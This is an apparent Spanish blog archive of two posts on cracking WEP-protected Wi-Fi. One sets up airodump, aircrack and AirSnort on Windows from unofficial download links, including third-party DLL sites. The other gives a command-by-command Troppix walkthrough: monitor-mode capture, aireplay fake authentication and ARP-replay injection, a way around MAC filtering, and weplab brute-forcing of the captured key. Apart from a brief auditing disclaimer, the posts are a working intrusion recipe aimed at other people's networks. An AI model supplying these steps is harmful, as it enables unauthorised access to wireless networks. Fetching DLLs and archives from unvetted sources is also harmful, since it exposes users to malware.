Archive for the ‘wpa’ Category

Hack wifi en windows: airrodump+aircrack y uso del airsnort

February 7, 2008

Tomado de: http://hwagm.elhacker.net/windows.htm

Realmente no solo es un programa, sino un conjunto completo, muy fáciles de utilizar.
Estas herramientas se basan en poder poner la tarjeta inalambrica en modo monitor, lo cual en windows no siempre es facil (debido a los drivers), pero en linux es mas sencillo.

El modo monitor es un modo de funcionamiento de la tarjeta inalámbrica en el cual es capaz de recoger todos los paquetes que aparecen en su radio de alcance pero sin inyectar ninguno a la red. El funcionamiento de una tarjeta WIFI trabajando en modo monitor es muy similar a un sniffer para redes TCP/IP convencionales.

Es una de las mejores herramientas para analizar el nivel de seguridad de nuestras instalaciones wireless ya que suele ser el arma mas utilizada por la mayoría de personas que quieren reducir nuestro ancho de banda.

1.- Airodump: Programa que permite capturar paquetes de datos.

2.- Aircrack: Permite averiguar y recuperar claves con cifrado WEP.

3.- Wzcook: Permite averiguar y recuperar claves con cifrado WEP almacenada en una estación cliente en windows.

4.- Airdecap.

Es necesario colocar en el mismo directorio los ficheros: <<Peek.dll, Peek5.sys y msvcr70.dll>>.

También puede ser necesario el fichero cygwin1.dll

Para bajar la suite completa hagan click en este link:

Comprimido con herramientas y manuales:
http://www.mediafire.com/?9wykuw1idhp

Manual de tarjetas de red inalambricas:
http://www.mediafire.com/?ew3ttdjmjz1

AirSnort solo funciona en dos versiones de este sistema operativo (Windows 2000 y Windows XP) según se indica en la página del creador de AirSnort y no esta previsto hacer compatible el programa con ninguna otra versión anterior este sistema operativo de Microsoft.

Al igual que en el caso de Linux podemos o bien ejecutar el programa ya compilado o bien compilar el programa nosotros mismos.

Suponemos que ya hemos descargado los drivers de AiroPeek compatibles con nuestra tarjeta y que los hemos instalado en nuestro sistema. En otro caso no podremos utilizar el programa.

El proceso de instalación para utilizar el fichero compilado o bien para compilar nosotros mismo el código es muy similar. Los siguientes pasos son comunes.

1º Descargar AirSnort de la pagina oficial

http://easynews.dl.sourceforge.net/sourceforge/airsnort/airsnort-0.2.7e.tar.gz

2º Una vez descargado deberemos descomprimir el fichero para obtener el programa y sus fuentes (Para esto podemos utilizar cualquier descompresor compatible).

3º Descargamos e instalamos las librerías necesarias para el funcionamiento del programa.

4º Copiamos los archivos Peek5.sys y peek.dll de la carpeta donde tengamos instalados los drivers de Airopeek dentro de la carpeta bin que encontraemos en la carpeta en la que tengamos instalado AirSnort.

5º Descargar iconv.dll dentro de la carpeta bin de AirSnort.
http://www.dlldump.com/cgi-bin/downloadcounts.cgi?rt=count&path=dllfiles/I/iconv.dll

6º Descargar intl.dll dentro de la carpeta bin de AirSnort.
http://www.dlldump.com/cgi-bin/downloadcounts.cgi?rt=count&path=dllfiles/I/intl.dll

7º Ejecutamos el archivo AirSnort.exe que se encuentra en la carpeta en la que hemos descomprimido el programa (dentro de la carpeta bin).

La única diferencia entre los dos procesos de instalación es la siguiente:

6-Bº Compilamos el código fuente descargado con cualquier compilador de C++ para windows.

Posted in aircrack, airodump, airsnort, hack, wep, wifi, wpa | Leave a Comment »

Auditoria wirelles, WEP y WPA

November 28, 2007

Se debe descargar la ultima versión de troppix (la version 1.2 ). Estas tecnicas se basan en poner la tarjeta inalambrica en modo monitor, ahora esto en windows es casi imposible de hacer debido a que no se dispone de los driver apropiados, pero en linux es bastante facil, de hecho troppix es una pequeña distribución linux, que esta especialmente diseñada para la auditoria wirelles, de hecho se debe usar solo para chequear la seguridad de las redes inalambricas.

Arrancamos la maquina desde CD con troppix, y luego en modo consola ponemos ( de hecho es lo primero que aparece):

1.- Uso del airodump y el aircrack:

rmmod ipw2200
echo 100 > /sys/class/firmware/timeout
modprobe ipw2200

Luego ponemos:

iwconfig
esto nos da el nombre de la tarjeta (eth0, ath0, etc).


Nuestra tarjeta es la única que al lado no pone “No wireless extensions”

Código:
airmon.sh start ath0

y ahora entramos en el airodump.

Código:
airodump ath0 pruebas 0 1

donde ath0 es la tarjeta, pruebas es el archivo donde se guardan las capturas ,0 es el canal( al escribir 0 indicamos que busque en todos) y 1 indica que sólo se guarden los IVs, para ahorrar espacio en disco o en memoria.

Miramos cual es el nombre de la red que queremos buscar la WEP y apuntamos el Channel y el ESSID( nombre de la red), en este manual pongamos que es el 6 y el ESSID “Uxio”.

Entonces pulsamos Control+Z y escribimos

Código:
iwconfig ath0 mode monitor channel 6 essid Uxio

Código:
airmon.sh start ath0 6

Código:
airodump ath0 pruebas 6 1

Bien, entonces así ya estaría. esperamos a que el DATA aumente y cuando llegue a más de 250.000 abrimos otra ventana de comandos (hacemos click en el monitor de abajo) y escribimos

Código:
aircrack pruebas*.ivs

Con un poco de suerte debería aparecer la clave aunque a veces se pueden llegar a necesitar hasta 4 millones de IVs (DATA)

2.- Acelerar el proceso cuando hay alguien conectado.

Los DATA suben muy lentos. Para que suban más rápido debemos usar aireplay. Miramos los datos que aparecen en la lista de abajo y cubrimos aquí los datos. Miramos que el BSSID coincida con el de nuestra red. Si hay varios, sirve cualquiera. Para escribir esto abrimos otra ventana.

Código:
aireplay -3 ath0 -b BSSID -h STATION

3.- Hacer que haya proceso o acelerarlo cuando no hay “Station” (Cliente), es decir, nadie conectado.

A veces ni siquiera van a subir los DATA ni vamos a tener nada en la lista de abajo que tenga que ver con nuestra red. Esto se soluciona de la siguiente manera. Primero abrimos otra ventana y luego ponemos:

Código:
aireplay -1 30 ath0 -e ESSID -a BSSID -h 00:11:22:33:44:55

Si al final de este comando nos pone association successful lo hemos hecho bien, pero esa ventana no la cerramos porque va a seguir enviando datos cada 30 segundos. Si nos da algún problema escribimos:

Código:
iwconfig ath0 rate 1M essid ESSID

Los problemas pueden ser debidos a:

  • El AP está muy lejos
  • El AP está protegido contra este ataque (no hay solución)
  • Los drivers no están parcheados para la reinyección, pero si estan usando Troppix no se preocupen por esto porque ya vienen instalados por defecto
  • Filtrado MAC. Nos pondrá algo así “AP rejects MAC”. Para solucionarlo tendremos que coneguir la MAC de un cliente, así que mejor dejamos que se conecte y hacemos el paso 5 directamente.


y luego lo de antes.

Código:
aireplay -1 30 ath0 -e ESSID -a BSSID -h 00:11:22:33:44:55


Bien, después de association succesful abrimos una nueva ventana de comandos y escribimos

Código:
aireplay -3 ath0 -b BSSID -h 00:11:22:33:44:55 -x 300

Si sale bien veremos que cuando lleve cierto número de READ empezarán a aumentar ARP y SENT. Además en el airodump veremos que los DATA empiezan a subir.

Después de todo esto tenemos que ejecutar el aircrack como ya dije antes para averiguar la clave.

Como curiosidad (y salvación para algunos), las redes que son del estilo “PACO 27″, sin barra (_), en aireplay quedarían así

Código:
-e PACO\ 27.

Una vez que tengamos unos 5000 en DATA (en caso de encriptacion wep) podemos intentar un ataque por fuerza bruta a ver si tenemos suerte, para ello usamos weplab:

Usage: weplab [OPTIONS]… FILE
Options:
–debug prints debug information
-v, –verbose print more information
-y, –dictionary uses words (from stdin) as wep keys
-k, –key [64|128] specifies 128 or 64 bits (default) key
-b, –bruteforce brute forces wep keys
-c, –capture capture encrypted data packets
-i, –interface for capturing packets with –capture
-r, –heuristics file uses weak keys and intelligent bruteforce
-a, –analysis analyze file and get lite statistics
-m, –multiprocess Assume of processes. Number must be between 1-64. Default 1.
–caplen maximun length of captured packets with –capture (default 80)
–fcs assume all captured frames has the FCS field
–keyid just analyze specific id Wep packets. Only for 64 bits keys. (default 0)
–prismheader assume all captured frames has the Prism header
–allow_dups do not control packets with duplicated IVs
–perc uses this minimun percentage of succeed when using FMS cracking
–ascii just use bytes 0×00-0x3F for bruteforce wep key with –bruteforce
–stability selects level of stability. Another way to specify which attacks, depending on their stability
level, will be launched
–debugkey Gives the real wep key to weplab to gather information about a crack. must be in
the form of AA:BB:CC:DD… and may be incomplete.
–attacks allows you to select which attacks will be used for heuristic mode.
–bssid does only process those packets that belongs to specified BSSID
-h, –help display this help and exit
-V, –version output version information and exit

Por ejemplo digamos que quieres hacer por fuerza bruta. Pues:
weplab -v -b archivo.cap

Si lo que quieres lo mismo pero solo probando caracteres ASCII:
weplab -v -b -ascii archivo.cap

Si quieres utilizar un diccionario:
weplab -v -y

El weplab se consigue en:

http://weplab.sourceforge.net/

Una vez que tengamos la clave estara en hexadecimal, podemos llevarla a ASCII que es como la necesitaremos con la ayuda de esto:

http://hwagm.elhacker.net/php/sneak.php

Esta es la tabla si lo quieren hacer manual:


ASCII Hex Símbolo
0 0 NUL
1 1 SOH
2 2 STX
3 3 ETX
4 4 EOT
5 5 ENQ
6 6 ACK
7 7 BEL
8 8 BS
9 9 TAB
10 A LF
11 B VT
12 C FF
13 D CR
14 E SO
15 F SI
ASCII Hex Símbolo
16 10 DLE
17 11 DC1
18 12 DC2
19 13 DC3
20 14 DC4
21 15 NAK
22 16 SYN
23 17 ETB
24 18 CAN
25 19 EM
26 1A SUB
27 1B ESC
28 1C FS
29 1D GS
30 1E RS
31 1F US
ASCII Hex Símbolo
32 20 (espacio)
33 21 !
34 22
35 23 #
36 24 $
37 25 %
38 26 &
39 27
40 28 (
41 29 )
42 2A *
43 2B +
44 2C ,
45 2D -
46 2E .
47 2F /
ASCII Hex Símbolo
48 30 0
49 31 1
50 32 2
51 33 3
52 34 4
53 35 5
54 36 6
55 37 7
56 38 8
57 39 9
58 3A :
59 3B ;
60 3C <
61 3D =
62 3E >
63 3F ?
ASCII Hex Símbolo
64 40 @
65 41 A
66 42 B
67 43 C
68 44 D
69 45 E
70 46 F
71 47 G
72 48 H
73 49 I
74 4A J
75 4B K
76 4C L
77 4D M
78 4E N
79 4F O
ASCII Hex Símbolo
80 50 P
81 51 Q
82 52 R
83 53 S
84 54 T
85 55 U
86 56 V
87 57 W
88 58 X
89 59 Y
90 5A Z
91 5B [
92 5C \
93 5D ]
94 5E ^
95 5F _
ASCII Hex Símbolo
96 60 `
97 61 a
98 62 b
99 63 c
100 64 d
101 65 e
102 66 f
103 67 g
104 68 h
105 69 i
106 6A j
107 6B k
108 6C l
109 6D m
110 6E n
111 6F o
ASCII Hex Símbolo
112 70 p
113 71 q
114 72 r
115 73 s
116 74 t
117 75 u
118 76 v
119 77 w
120 78 x
121 79 y
122 7A z
123 7B {
124 7C |
125 7D }
126 7E ~
127 7F 

Posted in aircrack, aireplay, airodump, troppix, wep, weplab, wifi, wifislax, wirelles, wpa | Leave a Comment »

Follow

Get every new post delivered to your Inbox.